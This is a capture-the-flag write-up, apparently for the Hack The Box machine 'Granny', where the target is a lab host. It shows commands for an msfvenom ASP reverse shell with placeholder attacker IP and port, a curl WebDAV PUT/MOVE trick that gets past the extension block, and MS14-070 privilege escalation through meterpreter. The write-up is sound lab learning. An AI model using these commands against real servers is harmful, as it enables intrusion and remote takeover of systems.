Let’s get started!

Level: Medium

Enumeration

COMMAND: nmap -sC -sV -oN granny 10.10.10.15

[Screenshot: Nmap scan output]

Let's open the URL in the browser and take a look!

URL: http://10.10.10.15

After visiting the URL we can clearly see that the site is under construction. An unfinished site like this often carries misconfigurations that can be revealed and used for further exploitation.

Checking the website directories with the dirb tool confirmed that there is some server misconfiguration. More importantly, the port scan revealed that the web server accepts HTTP WebDAV methods. A good way to test which of them actually work, including whether files of various extensions can be uploaded and executed, is davtest.

COMMAND: davtest -url http://10.10.10.15

After looking around online I found a good source on using curl to send specific HTTP methods:
WebDAV curl examples link

Exploitation


First a shell needs to be generated and uploaded to the web server. Since enumeration showed that the server (IIS) runs ASP, an ASP reverse shell can be generated with msfvenom.

COMMAND: msfvenom -p windows/shell_reverse_tcp LHOST=IP_ADDRESS LPORT=PORT -f asp > exp1o1t9r.asp

The server refuses a direct PUT of a .asp file, so the generated payload is saved locally as exp1o1t9r.txt and curl is used to upload it with the harmless .txt extension. Then the WebDAV MOVE method is used to rename the uploaded file to .asp, which the server does not block. Finally, requesting the .asp file makes IIS execute it.

root@exp1o1t9r:~/htb/machines/granny# curl -T 'exp1o1t9r.txt' http://10.10.10.15/exp1o1t9r.txt
root@exp1o1t9r:~/htb/machines/granny# curl -X MOVE --header 'Destination:http://10.10.10.15/exp1o1t9r.asp' 'http://10.10.10.15/exp1o1t9r.txt'
root@exp1o1t9r:~/htb/machines/granny# curl 'http://10.10.10.15/exp1o1t9r.asp'

Before requesting the .asp file, set up a listener (for example netcat) on the LHOST and LPORT used in the msfvenom command, so the reverse shell has something to connect back to!

BOOM! We got a shell. Let's grab the user flag!!

ACCESS DENIED!! :( The web server's service account cannot read the user flag, so privilege escalation is needed first.

Post exploitation


A whoami /all reveals that I do not have a privileged shell; this will require further post-exploitation enumeration to get a privileged shell.

Running systeminfo shows that the machine is an old version of Windows: Windows Server 2003 SP2.

After some research, several local exploits for this version were found at:

Local windows exploits link

The MS14-070 exploit appeared to be what I was looking for. The exploit binary was put onto the target machine the same way as the reverse shell. When executing the exploit there was a problem: the process started but hung without returning a privileged shell.

To solve this, Metasploit is used to upgrade the plain shell to a meterpreter session (for example with post/multi/manage/shell_to_meterpreter) and then migrate into a more stable process, so the exploit is not run from inside the IIS worker's request context.

Running the exploit again from the migrated meterpreter session escalates privileges, and the flags can be read!!

If you like my writeup , Give me Respect on my HTB profile : Exp1o1t9r
